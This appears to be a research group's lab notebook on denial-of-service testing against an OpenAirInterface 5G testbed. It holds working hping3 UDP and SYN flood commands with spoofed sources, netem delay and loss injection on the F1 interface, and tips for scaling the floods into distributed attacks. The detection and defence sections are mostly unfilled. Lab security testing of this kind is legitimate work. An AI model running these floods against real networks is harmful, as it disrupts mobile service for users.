#### Hand over / Tracking Area Update - #### PDU Session / Bearer Flooding - ### F1-U :::spoiler UDP flood - Joon | category | detail | |:--------- |:------------------------------------------- | | System | CN + F1/E1 Split gNB(1CU-C/3CU-U/3DU) + 4UE | | Hardware | 8GB RAM | | Tools | N/A | | Condition | Known IP, | | Result | MEM gorw 0.04MiB/sec | | Found | | | Drawback | | | Comment | | > d ![{D9B7D9EF-1EEA-4C61-8632-4881D83169CF}](https://hackmd.io/_uploads/HJK5Ha8exx.png) ```bash= sudo tcpdump -i any host 192.168.73.3 -w f1u-1-all.pcap cd docker rm attacker docker run -dit --name attacker --network rfsim5g-oai-f1c-net ubuntu:24.04 bash docker exec -it attacker bash apt update && apt install -y hping3 python3-scapy docker cp ~/flood_f1u.py attacker:/root python3 /root/flood_f1u.py ``` ::: :::spoiler UDP flood - Miracle {%preview https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/HkoAtBkxgx %} | category | detail | |:--------- |:--------------------------------------------------------- | | System | 3 VMs: CU (VM1), DU+UE (VM2), Attacker (VM3) | | Hardware | NAT & host-only adapters on each VM | | Tools | hping3, tcpdump, Wireshark, OAI softmodem | | Condition | Attacker in same 192.168.243.0/24 subnet; port 2152 known | | Result | Initial flood slowed DU; multi-port flood broke SCTP | | Found | ↑DU CPU & interrupt load; SCTP “Broken pipe”; UE retries | | Drawback | Single-VM flood = DoS not true DDoS; hping3 lacks SCTP | | Comment | Rapid, multi-port UDP flood can indirectly collapse F1-C | | requirement | detail | |:----------- |:------------------------------ | | Network | Same subnet (192.168.243.0/24) | | Privilege | Root on attacker VM | | Info | DU IP 192.168.243.129:2152 | | Tool | hping3 with `--rand-source` | | Timing | During active F1-U session | | aspect | notes | |:------------ |:------------------------------------------------------- | | Error | Single-VM flood only DoS, not distributed | | Error | hping3 can’t target SCTP directly on F1-C | | Assumption | No UDP rate-limiting on DU’s port 2152 | | Assumption | Network allows IP spoofing without ingress filters | | Optimization | Use `sendfast` or multi-threaded scripts for higher pps | | Optimization | Deploy ≥2 attacker VMs for true DDoS | > try... > Deploy multiple attacker VMs to simulate distributed flood. Use a tool with SCTP support for direct F1-C attacks. Increase packet rate via sendfast or parallel processes. Randomize both source and destination ports per packet. Time attacks to coincide with F1-C setup windows. ```bash= # Start CU, DU+UE cd ~/openairinterface5g/cmake_targets/ran_build/build sudo RFSIMULATOR=server ./nr-softmodem --rfsim --sa -O ../../../ci-scripts/conf_files/gNB_SA_CU.conf sudo RFSIMULATOR=server ./nr-softmodem --rfsim --sa -O ../../../ci-scripts/conf_files/gNB_SA_DU.conf sudo RFSIMULATOR=127.0.0.1 ./nr-uesoftmodem -r 106 --numerology 1 \ --band 78 -C 3619200000 --rfsim \ -O ../../../ci-scripts/conf_files/nrue.band78.106prb.l2sim.conf # On attacker VM: install tools sudo apt update sudo apt install hping3 tcpdump -y # Capture baseline sudo tcpdump -i ens33 port 2152 -w before.pcap # Single-port UDP flood (moderate rate) sudo hping3 --udp -p 2152 -i u500 --rand-source 192.168.243.129 # Multi-port rapid flood (high impact) sudo hping3 --udp -i u10 --rand-source --baseport 2100 -p ++2200 192.168.243.129 # Stop capture after ~1 min: Ctrl+C ``` ::: ### F1AP #### Information sniffing - #### Fuzzing - ### None of above :::spoiler Delay Simulation - Miracle {%preview https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/SkgmMBC0ye %} | category | detail | |:--------- |:--------------------------------------------------------- | | System | CU, DU, UE on localhost via RFSIM (127.0.0.4 ↔ 127.0.0.3) | | Hardware | . | | Tools | `tc netem`, `tcpdump`, Wireshark | | Condition | Baseline SCTP capture on port 38472 | | Result | DU out-of-sync, `ulsch_errors` ↑, UE fails RRC connect | | Found | SCTP packets ↓, bytes ↓, throughput ↓ after delay/loss | | Drawback | Simulated delay only; no real packet manipulation | | Comment | Delay/loss on F1 slows control signaling | | requirement | detail | |:----------- |:------------------------------------------------ | | Privilege | `root` to run `tc qdisc` on loopback | | Interface | `lo` with F1-C SCTP at 127.0.0.4/127.0.0.3:38472 | | Tools | `tc`, `tcpdump`, `ss`, `ping`, Wireshark | | Baseline | Pre-attack packet captures & performance logs | | aspect | notes | |:------------ |:---------------------------------------------------- | | Error | Only injects delay/loss—no payload tampering | | Assumption | Loopback netem reflects real network impairments | | Assumption | SCTP retransmits aren’t rate-limited | | Optimization | Add jitter and packet reordering to worsen impact | | Optimization | Script `tc qdisc` commands for repeatable automation | > try... Use a real network path instead of loopback. Combine delay, loss, and jitter for varied impairment. Automate CPU/log collection during the test. Sweep multiple delay/loss percentages to characterize threshold. Compare with other qdisc types (e.g., TBF, netfilter rules). ```bash= # heck SCTP port for F1-C sudo ss -H -n -a | grep sctp # Capture baseline F1 traffic sudo tcpdump -i lo port 38472 -w baseline_f1_traffic.pcap # Inject 200 ms delay and 10 % packet loss sudo tc qdisc add dev lo root netem delay 200ms loss 10% # Observe DU/UE logs and Wireshark captures # Test connectivity from DU to CU ping 127.0.0.3 -c 15 ping 127.0.0.4 -c 13 # Reset network emulation sudo tc qdisc del dev lo root ``` ::: :::spoiler Delay Simulation 2 - Miracle {%preview https://hackmd.io/@V2BwvPo9SWWFiy3BHGiAhQ/HJXb-1pRkg %} | category | detail | |:--------- |:---------------------------------------------------- | | System | LIVE555 server + OAI CU/DU + VLC client | | Hardware | . | | Tools | LIVE555, VLC, ffmpeg, hping3, tc-netem, tcpdump, top | | Condition | RTSP port 8554 open and streaming baseline | | Result | Stream freeze, dropped frames, higher CPU load | | Found | SYN flood too weak; netem delay/loss effective | | Drawback | Only simulates RTSP, not real F1 traffic | | Comment | Requires root and pre-configured video stream | | requirement | detail | |:---------------- |:------------------------------------------- | | Network access | Root on host loopback or Docker interface | | Tool privilege | `sudo` for `hping3` and `tc qdisc` commands | | Known info | RTSP port 8554, server & client IPs | | Pre-installed SW | LIVE555, ffmpeg, VLC | | Timing control | Attack during active streaming session | | aspect | note | |:------------ |:-------------------------------------------------------- | | Error | SYN flood alone was too weak | | Assumption | RTSP flood translates to CU CPU stress | | Optimization | Use high-rate send tools (e.g. `sendfast`) | | Optimization | Apply netem on real network interface, not just loopback | > try... Use sendfast or tcpreplay for higher packet rates Combine TCP SYN flood with UDP flood on port 8554 Automate netem scripts triggered by streaming metrics Target real GTP-U tunnels instead of RTSP for genuine F1-U testing ```bash= # Build & run LIVE555 server cd ~/live555 && ./genMakefiles linux && make -j4 cd live && ./mediaServer/live555MediaServer # Prepare video ffmpeg -i vid.mp4 -vcodec libx264 -f h264 vid2.264 # Play stream vlc rtsp://127.0.0.1:8554/vid2.264 # SYN flood attack sudo hping3 -S -p 8554 --flood 127.0.0.1 # Inject delay & loss sudo tc qdisc add dev lo root netem delay 300ms loss 20% # Reset network sudo tc qdisc del dev lo root ``` ::: ## Upgrade attack - ## Verify attack - # Part II: Detection ## Develop Procedure ### 1. Get index | type | tools | |:------------------- |:------------ | | packet | tcpdump | | network flow matric | grep, docker | | hardware matric | | | KPIs? | RICs | ### 2. Graph layout | type | tools | |:-------- |:----------- | | chart | Speedometer | | topology | EtherApe | | alert | | ### 3. Detect attack - by which algorithm? - rate anormaly - attack pattern ### 4. Automate by scripting ```bash= code ``` # Part III: Defence ## Steps - Try various defence - [ ] Filtering - [ ] Rate Limiting / Throttling(dynamic) - [ ] Encryption/Authentication/Integrity - [ ] Dynamic allocation of DU by CU(disconnect/reboot) - [ ] Self protection(RAN changes ip and reboot) - Upgrade Defence - [ ] Automate defence # Wrapping stage distribution table # > [name=Joon] > > experiment environment: > > software: > Ubuntu 24.04.2 LTS (amd64) > VMware Workstation 17 Player (Non-commercial) > Windows 11 > > > hardware: > intel CPU - 10 cores > RAM - 32GB > NVIDIA GPU > > [chatGPT](https://chatgpt.com) > [Cursor](https://cursor.com)